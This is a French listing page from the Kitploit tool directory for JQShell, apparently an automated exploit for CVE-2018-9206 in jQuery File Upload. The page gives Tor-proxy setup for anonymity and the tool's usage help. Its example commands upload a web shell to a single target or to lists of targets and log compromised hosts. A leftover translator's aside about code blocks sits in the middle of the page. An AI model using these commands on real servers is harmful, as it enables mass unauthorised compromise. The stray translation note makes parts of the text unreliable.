Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
JQShell — Outil d'exploit automatisé pour CVE-2018-9206 (jQuery File Upload) avec balayage mono/multi-cible, support du proxy Tor et journalisation des sorties pour les tests d'intrusion et à des fins éducatives. | Kitploit
Outils/GitHubGitHub/stahlz/jqshell
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubstahlz/jqshell

JQShell

Outil d'exploit automatisé pour CVE-2018-9206 (jQuery File Upload) avec balayage mono/multi-cible, support du proxy Tor et journalisation des sorties pour les tests d'intrusion et à des fins éducatives.

Voir le dépôt
6214il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

alt text

JQShell

Une version armée de CVE-2018-9206.

Avertissement

Utiliser cet outil contre des serveurs que vous ne contrôlez pas est illégal dans la plupart des pays. L'auteur décline toute responsabilité quant aux actions de ceux qui utilisent ce logiciel à des fins illégales. Ce logiciel est destiné uniquement à un usage éducatif. Aucun serveur n'a été illégalement compromis lors de la création de ce logiciel.

Fonctionnalités

Cible unique Cibles multiples Tor

Prérequis

Veuillez installer les paquets requis suivants.

Python3

root@kitploit:~
pip3 install requests pysocks subprocess stem

Port de contrôle Tor

Pour utiliser Tor dans ce script, vous devez modifier votre fichier torrc et activer le port de contrôle sur 9051.

En général, ce fichier se trouve ici : /etc/tor/torrc

Ouvrez ce fichier et modifiez cette ligne :

root@kitploit:~
#ControlPort 9051

en

root@kitploit:~
ControlPort 9051
root@kitploit:~
redémarrez le service tor

Utilisation

root@kitploit:~
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
                  [-o OUTPUTZ] [-tor]

optional arguments:
  -h, --help            show this help message and exit
  -l LIST_INIT, --list LIST_INIT
                        Select for a list of assets to exploit
  -t SINGLE_TARGET, --target SINGLE_TARGET
                        Single exploit target
  -s SHELL_LOC, --shell SHELL_LOC
                        This is required, put the fullpath to your shell
  -o OUTPUTZ, --output OUTPUTZ
                        This is full path to were you want to save your list
                        of confirmed hosts
  -tor, --tor_proxy     Select if you have tor installed, you will need to
                        enable control port

(Note: l'aide en anglais est généralement conservée telle quelle dans un outil, mais la description des arguments est du texte naturel à traduire. Toutefois, il s'agit d'un bloc de code de l'aide affichée par l'outil, donc on ne traduit pas l'intérieur du bloc de code. Le texte en français de la traduction doit se situer en dehors des blocs de code. Ici, le bloc de code contient l'usage et les arguments en anglais, ce qui est normal pour un outil. On ne traduit pas le contenu des blocs de code. Donc on laisse tel quel.)

Exemples

Exécution contre une cible unique.

root@kitploit:~
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php

Exécution contre une cible unique, avec sauvegarde de la sortie.

root@kitploit:~
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt

Exécution d'une liste, avec sauvegarde de la sortie.

root@kitploit:~
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt

Auteur

  • Joshua Whitaker
  • Twitter @_Stahlz
  • Email - [email protected]
  • Site web - stahl.io
Télécharger l’outil